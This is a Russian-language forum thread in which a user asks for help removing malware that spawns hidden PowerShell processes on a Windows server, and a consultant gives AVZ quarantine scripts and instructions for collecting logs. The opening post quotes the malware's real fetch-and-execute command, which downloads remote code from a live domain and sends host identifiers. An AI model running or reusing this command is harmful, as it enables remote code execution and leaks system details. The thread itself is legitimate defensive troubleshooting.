Имя пользователя:
Пароль:  
Помощь | Регистрация | Забыли пароль?  | Правила  

Компьютерный форум OSzone.net » Информационная безопасность » Лечение систем от вредоносных программ » Powershell грузить процессор + память.

Ответить
Настройки темы
Powershell грузить процессор + память.

Новый участник


Сообщения: 16
Благодарности: 0

Профиль | Отправить PM | Цитировать


Изменения
Автор: TimofeevAGVN53
Дата: 06-11-2019
Windows 2008 r2 после загрузки появляется несколько процессов powershell
Вот с таким скриптов
powershell -nop -w hidden -ep bypass -c "IEX (New-Object Net.WebClient).downloadstring('http://down.bddp.net/d64.dat?allv6&mac=00-19-D1-A9-99-6E&av=&version=6.1.7601&bit=64-bit&flag2=True&domain=hard.nov&user=SMS01$&PS=True')"

Отправлено: 12:08, 02-10-2019

 

Аватара для Sandor

Ветеран


Консультант


Сообщения: 5255
Благодарности: 1319

Профиль | Отправить PM | Цитировать


Здравствуйте!

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):

Код: Выделить весь код
begin
 ClearQuarantineEx(true);
 QuarantineFile('C:\Windows\system32\tasks\00-19-D1-A9-99-6E', '');
 QuarantineFile('C:\Windows\system32\tasks\Rass', '');
 DeleteSchedulerTask('Microsoft\Windows\00-19-D1-A9-99-6E');
 DeleteSchedulerTask('Microsoft\Windows\Rass');
end.
Перезагрузите компьютер вручную.

После перезагрузки, выполните такой скрипт:

Код: Выделить весь код
begin
 DeleteFile(GetAVZDirectory+'quarantine.7z');
 ExecuteFile(GetAVZDirectory+'7za.exe', 'a -mx9 -pmalware quarantine .\Quarantine\*', 1, 300000, false);
end.
Файл quarantine.7z из папки с распакованной утилитой AVZ отправьте с помощью формы отправки карантина или на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: malware в теле письма.


Повторите логи по правилам. Для повторной диагностики запустите снова Autologger.
Прикрепите свежий CollectionLog.

-------

Это сообщение посчитали полезным следующие участники:

Отправлено: 16:58, 02-10-2019 | #2



Для отключения данного рекламного блока вам необходимо зарегистрироваться или войти с учетной записью социальной сети.

Если же вы забыли свой пароль на форуме, то воспользуйтесь данной ссылкой для восстановления пароля.


Новый участник


Сообщения: 16
Благодарности: 0

Профиль | Отправить PM | Цитировать


Спасибо, как снимать лог с виртуальных машин Hyper-V?

Отправлено: 17:35, 02-10-2019 | #3


Аватара для Sandor

Ветеран


Консультант


Сообщения: 5255
Благодарности: 1319

Профиль | Отправить PM | Цитировать


В первом сообщении вы же прикрепили лог.

-------


Отправлено: 08:38, 03-10-2019 | #4


Новый участник


Сообщения: 16
Благодарности: 0

Профиль | Отправить PM | Цитировать


Этот был один из серверов. И там всё стало хорошо. Есть ещё три сервера, но они на виртуальных машинах и логирование не удаётся выполнить из-за того что подключен по РДП. Через оснастку mmc то же самое говорит.

Отправлено: 08:49, 03-10-2019 | #5


Аватара для Sandor

Ветеран


Консультант


Сообщения: 5255
Благодарности: 1319

Профиль | Отправить PM | Цитировать


Цитата TimofeevAGVN53:
И там всё стало хорошо »
Так покажите контрольный лог.

Цитата TimofeevAGVN53:
Есть ещё три сервера »
Действуем по принципу один компьютер - одна тема.
Сделайте на виртуалках так:
Скачайте AutorunsVTchecker. Распакуйте и запустите. Не дожидаясь окончания сканирования,
  1. Скачайте Universal Virus Sniffer (uVS)
  2. Извлеките uVS из архива или из zip-папки. Откройте папку с UVS и запустите файл start.exe. В открывшимся окне выберите пункт "Запустить под текущим пользователем".
  3. Выберите меню "Файл" => "Сохранить полный образ автозапуска". Программа предложит вам указать место сохранения лога в формате "имя_компьютера_дата_сканирования". Лог необходимо сохранить на рабочем столе.
    !!!Внимание. Если у вас установлены архиваторы WinRAR или 7-Zip, то uVS в автоматическом режиме упакует лог в архив, иначе это будет необходимо сделать вам вручную.
  4. Дождитесь окончания работы программы и прикрепите лог к посту в теме.
    !!! Обратите внимание, что утилиты необходимо запускать от имени Администратора. По умолчанию в Windows XP так и есть. В Windows Vista и Windows 7 администратор понижен в правах по умолчанию, поэтому, не забудьте нажать правой кнопкой на программу, выбрать Запуск от имени Администратора, при необходимости укажите пароль администратора и нажмите "Да".
Подробнее читайте в руководстве Как подготовить лог UVS.

-------


Отправлено: 10:00, 03-10-2019 | #6


Новый участник


Сообщения: 16
Благодарности: 0

Профиль | Отправить PM | Цитировать


После выполнения данных скриптов - через несколько дней опять появляются процессы powershell.
Выполнение данного скрипта помогает на некоторое время.

Отправлено: 14:48, 10-10-2019 | #7


Новый участник


Сообщения: 16
Благодарности: 0

Профиль | Отправить PM | Цитировать


на hyper-v core как то можно запустить эти скрипты?

Отправлено: 15:11, 10-10-2019 | #8


Аватара для Sandor

Ветеран


Консультант


Сообщения: 5255
Благодарности: 1319

Профиль | Отправить PM | Цитировать


Я ведь говорил, что
Цитата Sandor:
один компьютер - одна тема »
так как скрипт не универсальный и основан на логах конкретной системы.

Продолжать вы почему-то не хотите.

-------


Отправлено: 15:32, 10-10-2019 | #9


Новый участник


Сообщения: 16
Благодарности: 0

Профиль | Отправить PM | Цитировать


Это про тот же компьютер. Нам опять запустились процессы. Про Hyper-v мне создать отдельную тему?

Отправлено: 16:13, 10-10-2019 | #10



Компьютерный форум OSzone.net » Информационная безопасность » Лечение систем от вредоносных программ » Powershell грузить процессор + память.

Участник сейчас на форуме Участник сейчас на форуме Участник вне форума Участник вне форума Автор темы Автор темы Шапка темы Сообщение прикреплено

Похожие темы
Название темы Автор Информация о форуме Ответов Последнее сообщение
[решено] Powershell.exe грузит процессор Vilgon Лечение систем от вредоносных программ 7 26-03-2019 12:20
Разное - [решено] Powershell.exe грузит процессор Vilgon Microsoft Windows 7 2 25-03-2019 15:42
svchost сильно грузить процессор после запуска системы vabrutski Лечение систем от вредоносных программ 2 04-09-2013 15:22
Тачпад стал сильно грузить процессор Nikolaich Ноутбуки 3 19-04-2013 01:04
Память и процессор. feel_on Материнские платы и память 9 17-05-2010 19:15




 
Переход